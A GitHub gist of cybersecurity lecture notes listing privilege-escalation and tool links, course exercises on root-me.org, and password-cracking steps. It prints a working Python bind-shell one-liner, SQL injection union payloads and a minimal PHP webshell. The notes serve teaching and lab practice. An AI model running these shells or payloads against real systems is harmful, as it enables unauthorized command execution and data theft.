Skip to content

Instantly share code, notes, and snippets.

@sbnsec

sbnsec/TI_notes.md

Last active January 13, 2023 10:12
Show Gist options
  • Save sbnsec/0c8c88757a418f8e320ced2ce78efa8d to your computer and use it in GitHub Desktop.
Save sbnsec/0c8c88757a418f8e320ced2ce78efa8d to your computer and use it in GitHub Desktop.
Download ZIP
Raw
TI_notes.md

Cybersecurity lecture notes

This file list interesting link related to computer security (tools, info, tuto, interesting sites, ressources)

Interesting links

PrivESC

Windows Privilege Escalation CheatCheet

Linux Privilege Escalation Binary

LinEnum

Unix privesc

Linprivchecker

Monitor linux process

Reserve shell

Ngrok : Exspose ports to Internet

Plink ssh tunnels on windows

Steganography

Aperi'Solve performs layer analysis on image

Tools

CyberChef : Encode and decode data

Download KALI linux live 2020.4

how to crack a password

  1. Identify the type of hash
  1. Use john the ripper (already installed on kali)
  1. Use a custom wordlist on john the ripper

Reverse/bind shell

Reverse shell Aide : https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md

Bind Shell Aide : https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Bind%20Shell%20Cheatsheet.md

Exemple de bind Shell :

python3 -c 'exec("""import socket as s,subprocess as sp;s1=s.socket(s.AF_INET,s.SOCK_STREAM);s1.setsockopt(s.SOL_SOCKET,s.SO_REUSEADDR, 1);s1.bind(("0.0.0.0",51337));s1.listen(1);c,a=s1.accept();\nwhile True: d=c.recv(1024).decode();p=sp.Popen(d,shell=True,stdout=sp.PIPE,stderr=sp.PIPE,stdin=sp.PIPE);c.sendall(p.stdout.read()+p.stderr.read())""")'

SQL exemples Payloads

https://portswigger.net/web-security/sql-injection/cheat-sheet

user"; --
user" union select 1,2,3,4,@@version; --
user" union select 1,2,3,4,group_concat(schema_name) from information_schema.schemata; --

PHP the most simple webshell

<?php
    if(isset($_GET['cmd']))
    {
        system($_GET['cmd']);
    }
//Pour aller plus loin : https://github.com/flozz/p0wny-shell
?>

Exercices

  • Slide 15 :

Scanner le site scanme.nmap.org

  • Slide 24

https://www.root-me.org/fr/Challenges/Web-Serveur/HTTP-Headers

https://www.root-me.org/fr/Challenges/Web-Serveur/User-agent

https://www.root-me.org/fr/Challenges/Web-Serveur/Fichier-de-sauvegarde

  • Slide 52

https://www.root-me.org/fr/Challenges/Web-Serveur/Directory-traversal

https://www.root-me.org/fr/Challenges/Web-Serveur/File-upload-double-extensions

  • Slide 57

https://www.root-me.org/fr/Challenges/Web-Serveur/SQL-injection-authentification

Strings to decode

427261766f2074752061207265757369206c65206368616c6c656e6765
aidhaSBwZXJkdQ==
26237834373b26237834373b26237832303b26237832313b26237832303b26237837343b26237837353b26237832303b26237836313b26237832303b26237837323b26237836353b26237837353b26237837333b26237837333b26237836393b

Wifi challenge

WEP - https://ufile.io/h28b15y2 WPA2 - https://ufile.io/3qfmvxzn

QCM

https://forms.gle/Vbwanuo4q5aj6UeC6

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment